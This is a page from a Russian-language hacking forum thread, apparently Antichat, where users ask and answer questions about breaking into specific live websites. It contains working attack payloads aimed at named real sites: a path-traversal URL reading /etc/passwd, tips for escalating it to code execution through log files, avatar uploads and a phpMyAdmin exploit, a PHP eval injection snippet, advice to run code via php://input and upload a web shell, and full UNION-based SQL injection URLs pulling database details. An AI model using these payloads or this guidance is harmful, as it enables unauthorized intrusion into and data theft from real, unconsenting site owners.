Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
Page 870 of 1207
  1. Seravin

    Seravin Active Member

    Joined:
    25 Nov 2009
    Messages:
    475
    Likes Received:
    190
    Reputations:
    221
    ну так круче, инфа проверена
     
    #17381 Seravin, 20 Jul 2011
  2. swat_

    swat_ Member

    Joined:
    4 Nov 2009
    Messages:
    137
    Likes Received:
    30
    Reputations:
    1
    http://seafightclub.com/index.php?page=../../../../../../../../etc/passwd%00
    что можно сделать с этим? =(
    в пхп не силён
     
    #17382 swat_, 20 Jul 2011
  3. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    во первых можно пробовать метод Slesh а, через Webalizer

    http://seafightclub.com/index.php?page=../../stats/index.html%00

    во вторых там есть форум, пробуй аватарку

    в третих там ПМА есть, смотри версию..

    а про environ и тп забудь, пхп тут cgi программа
     
    _________________________
    #17383 Konqi, 20 Jul 2011
    1 person likes this.
  4. swat_

    swat_ Member

    Joined:
    4 Nov 2009
    Messages:
    137
    Likes Received:
    30
    Reputations:
    1
    1 не канает :(

    2 тоже не работает :(

    3 пма не бажный :(
     
    #17384 swat_, 20 Jul 2011
  5. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886

    что значит "не канает" ?
     
    _________________________
    #17385 Konqi, 20 Jul 2011
  6. swat_

    swat_ Member

    Joined:
    4 Nov 2009
    Messages:
    137
    Likes Received:
    30
    Reputations:
    1
    в смысле не работает
    а тут http://seafightclub.com/usage_201107.html

    Not Found
    The requested URL /usage_201107.html was not found on this server.

    да и домашней папки нет WebAlizer а
     
    #17386 swat_, 20 Jul 2011
  7. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    http://seafightclub.com/index.php?page=../../stats/usage_201107.html%00

    папка /stats/ это и есть домашняя папка вебалайзера =\
     
    _________________________
    #17387 Konqi, 20 Jul 2011
    Last edited: 20 Jul 2011
  8. swat_

    swat_ Member

    Joined:
    4 Nov 2009
    Messages:
    137
    Likes Received:
    30
    Reputations:
    1
    еще есть какие нибудь варианты? :(
     
    #17388 swat_, 20 Jul 2011
  9. expupkin

    expupkin New Member

    Joined:
    15 Jan 2010
    Messages:
    0
    Likes Received:
    1
    Reputations:
    0
    Подскажите каким софтом пользоватся чтобы находить всяческие бэкапы, changelogs, и другие полезные файлы на сайте ?
     
    #17389 expupkin, 20 Jul 2011
  10. swat_

    swat_ Member

    Joined:
    4 Nov 2009
    Messages:
    137
    Likes Received:
    30
    Reputations:
    1
    ArxScanSite
     
    #17390 swat_, 20 Jul 2011
  11. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,035
    Likes Received:
    534
    Reputations:
    935
    Там есть phpmyadmin, и все условия для работы этого сплоита:
    http://snipper.ru/view/103/phpmyadmin-33102-3431-session-serializer-arbitrary-php-code-execution-exploit/

    Я перепроверил ;)
     
    _________________________
    #17391 Expl0ited, 21 Jul 2011
  12. randman

    randman Members of Antichat

    Joined:
    15 May 2010
    Messages:
    1,366
    Likes Received:
    610
    Reputations:
    1,101
    Ну тогда уж стоит сказать, что можно выполнять код без вставки огораживающих кавычек.
    PHP:
    <?php
    $a     "{$_GET['as']($_GET['eval'])}";
    echo     $a;
    //?eval=phpinfo()
    ?>
    Уязвимости такого типа встречаются нередко.
     
    #17392 randman, 21 Jul 2011
    Last edited: 21 Jul 2011
  13. M1ks

    M1ks Elder - Старейшина

    Joined:
    23 Aug 2007
    Messages:
    140
    Likes Received:
    9
    Reputations:
    0
    http://mail.pnz.ru/face/action.php?action=aff_mail&mail=7&verbose=0&lang=../../face/index это пхп инъекция? если да, то че с ней сделать можно?)
     
    #17393 M1ks, 21 Jul 2011
  14. Sc0rpi0n

    Sc0rpi0n Banned

    Joined:
    23 Feb 2010
    Messages:
    75
    Likes Received:
    22
    Reputations:
    16
    Есть php инъекция c mq=off, Но там врублен open_basedir.
    Можно ли с применением новых техник типа
    data:,
    php://stdin
    - php://stdout
    - php://stderr
    - php://output
    - php://input

    и т.п. сделать читалку, чтобы читать исходники а не инклудить
     
    #17394 Sc0rpi0n, 21 Jul 2011
  15. randman

    randman Members of Antichat

    Joined:
    15 May 2010
    Messages:
    1,366
    Likes Received:
    610
    Reputations:
    1,101
    Через php://input выполнить код, который и будет читать файлы. Однако легче будет залить шелл.
    https://forum.antichat.ru/thread232773.html

    Так же не забудь о загрузке аватаров и т. п.
     
    #17395 randman, 21 Jul 2011
    Last edited: 21 Jul 2011
  16. plaeer

    plaeer New Member

    Joined:
    8 Mar 2011
    Messages:
    149
    Likes Received:
    3
    Reputations:
    1
    Приведите кто-нибудь пример. Каким образом с помощью пхп юзать скули через пост.
     
    #17396 plaeer, 22 Jul 2011
  17. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    http://forum.antichat.ru/showpost.php?p=2580704&postcount=16410
     
    _________________________
    #17397 Konqi, 22 Jul 2011
    1 person likes this.
  18. heks

    heks Banned

    Joined:
    24 Aug 2007
    Messages:
    713
    Likes Received:
    95
    Reputations:
    12
    Вот к примеру скуль
    http://www.riviera-crimea.com/detail.php?id=425
    Как пошагово ее раскрутить до такого вида раскручивать ручками
    http://www.riviera-crimea.com/detail.php?id=-425'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,concat_ws(0x3a,user(),version(),database()),15,16+--+

    Вопрос еще такой почему если мы убираем или ковычку или знак минуса то скуль невыводит результат. От чего это зависит?
     
    #17398 heks, 22 Jul 2011
  19. d1v

    d1v Elder - Старейшина

    Joined:
    21 Feb 2009
    Messages:
    676
    Likes Received:
    331
    Reputations:
    120
    а я думал ты хакир %)
    https://forum.antichat.ru/thread217895-sql+faq.html
     
    #17399 d1v, 22 Jul 2011
    3 people like this.
  20. heks

    heks Banned

    Joined:
    24 Aug 2007
    Messages:
    713
    Likes Received:
    95
    Reputations:
    12
    Мне бы расписать почему при
    http://www.riviera-crimea.com/detail.php?id=-425'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,co ncat_ws(0x3a,user(),version(),database()),15,16+--+ данные выводятся
    http://www.riviera-crimea.com/detail.php?id=425+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,co ncat_ws(0x3a,user(),version(),database()),15,16+--+ (убираем минусили ковычку) данные не выводятся
    как узнать когда писать именно ковычку, минус и ковычку а когда просто ковычку
     
    #17400 heks, 22 Jul 2011
    Last edited: 22 Jul 2011
(You must log in or sign up to post here.)
Page 870 of 1207
Thread Status:
Not open for further replies.
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.